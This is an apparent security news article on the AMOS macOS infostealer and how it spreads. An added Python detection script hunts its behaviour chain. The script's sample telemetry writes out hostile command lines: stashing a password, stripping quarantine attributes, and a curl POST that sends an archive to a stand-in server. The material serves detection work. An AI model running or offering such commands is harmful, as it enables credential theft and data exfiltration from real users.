- AMOS relies on users executing malicious terminal commands themselves
- Sophos MDR identified ClickFix-style social engineering in macOS attacks
- Half of macOS stealer reports involved AMOS, but Apple is fighting back
Atomic macOS Stealer, also known as AMOS, is a persistent macOS security threat because it does not need sophisticated zero-day vulnerabilities to compromise Apple devices.
Instead, this malware family repeatedly exploits ordinary user behaviour by tricking users into typing a single command into their own Terminal application.
A recent incident investigated by Sophos MDR teams revealed exactly this pattern: a ClickFix-style ruse persuaded a victim to execute a malicious line of code manually.
AMOS uses psychological manipulation over technical exploits
This approach has become increasingly prominent, with researchers noting similar social engineering tactics in multiple macOS infostealer campaigns throughout 2025 and early 2026.
AMOS accounted for nearly 40% of all macOS protection updates deployed by Sophos in 2025, more than double the share of any other macOS malware family during the same period.
Furthermore, almost half of all macOS stealer customer reports in the last three months involved AMOS or its close variants.
Security firms have tracked this malware-as-a-service operation since at least April 2023, with notable campaigns including a variant dubbed SHAMOS reported by CrowdStrike in August 2025.
In December 2025, Huntress documented infections spreading through poisoned search results related to ChatGPT and Grok conversations.
How the malware harvests passwords and data
After the initial Terminal command executes a bootstrapping script, the malware immediately prompts the user for their macOS system password.
The malicious code then validates this credential locally using a simple directory services command before storing it in a hidden file named .pass within the user’s home directory.
Once the password is secured, AMOS downloads a secondary payload that removes extended attributes to bypass macOS security warnings.
The stealer also checks whether it is running inside a virtual machine or sandbox environment by querying system_profiler data for indicators such as QEMU, VMware, or KVM.
The malware then proceeds to harvest an extensive range of sensitive information, including the macOS Keychain database, browser credentials from Firefox and Chrome, extension storage files, and local session tokens.
Some variants also deploy fake Ledger Wallet and Trezor Suite applications designed to steal cryptocurrency wallet seeds and credentials.
All collected files are compressed into a single archive using the ditto utility before being transmitted to attacker-controlled servers via curl POST requests.
To maintain long-term access, the malware installs a LaunchDaemon that ensures automatic execution after every system reboot.
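As an added defender-side example (not code from the Sophos investigation or this article), the following Python sketch maps the behaviour chain described above onto regex rules over process-execution records and flags a host once several stages appear. The command names dscl and xattr, the regex patterns and the sample events are assumptions constructed for illustration.

```python
"""Hunt for the AMOS behaviour chain in process-execution telemetry."""
import re

# One rule per stage described in the write-up. The specific command names
# (dscl for the local password check, xattr for stripping attributes) are
# assumptions about how those steps are implemented, not values from the article.
STAGES = {
    "password_check": re.compile(r"\bdscl\b.*-authonly"),
    "password_stash": re.compile(r"(^|/|\s)\.pass\b"),            # hidden .pass in $HOME
    "xattr_strip":    re.compile(r"\bxattr\b.*(-c|-d\s+com\.apple\.quarantine)"),
    "vm_check":       re.compile(r"\bsystem_profiler\b"),
    "archive":        re.compile(r"\bditto\b.*(-c|--zip|-k)"),
    "exfil":          re.compile(r"\bcurl\b.*(-X\s*POST|--data|-F\s)"),
    "persistence":    re.compile(r"/Library/LaunchDaemons/.*\.plist"),
}

# Constructed sample telemetry: (timestamp, user, command line). The first
# record is benign and must not match any stage.
SAMPLE_EVENTS = [
    ("09:59:00", "alice", "curl -s https://example.com/index.html"),
    ("10:00:01", "alice", "dscl . -authonly alice"),
    ("10:00:02", "alice", "sh -c 'echo hunter2 > /Users/alice/.pass'"),
    ("10:00:05", "alice", "xattr -c /Users/alice/Downloads/update"),
    ("10:00:06", "alice", "system_profiler SPHardwareDataType"),
    ("10:01:00", "alice", "ditto -c -k --sequesterRsrc /tmp/out /tmp/out.zip"),
    ("10:01:05", "alice", "curl -X POST -F file=@/tmp/out.zip http://c2.invalid/up"),
    ("10:01:10", "root",  "launchctl load /Library/LaunchDaemons/com.example.agent.plist"),
]

def match_stages(events):
    """Return {stage: (timestamp, cmdline)} for the first event hitting each stage."""
    hits = {}
    for ts, _user, cmd in events:
        for name, rx in STAGES.items():
            if name not in hits and rx.search(cmd):
                hits[name] = (ts, cmd)
    return hits

def verdict(events, min_stages=3):
    """Flag the host when at least min_stages distinct stages of the chain are seen."""
    hits = match_stages(events)
    return {"stages": list(hits), "suspicious": len(hits) >= min_stages}

if __name__ == "__main__":
    print(verdict(SAMPLE_EVENTS))
```

Any single stage (a curl POST, a ditto archive) is common on a developer's Mac; the value is in requiring several stages from one user session, which is why `verdict` thresholds on distinct stages rather than alerting on each rule.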
Despite the severity of AMOS, it is worth questioning whether security vendors are overstating its novelty, given that infostealers have been targeting Windows systems for nearly two decades.
The malware’s heavy reliance on user consent — someone must willingly paste and run a Terminal command — creates a significant barrier that technically literate users might easily avoid.
Moreover, Apple’s ongoing improvements to Gatekeeper, XProtect, and notarization requirements could render AMOS largely ineffective within a few operating system updates.
The real danger may lie less in AMOS itself and more in the uncomfortable truth that no platform is immune to users who ignore basic security warnings.
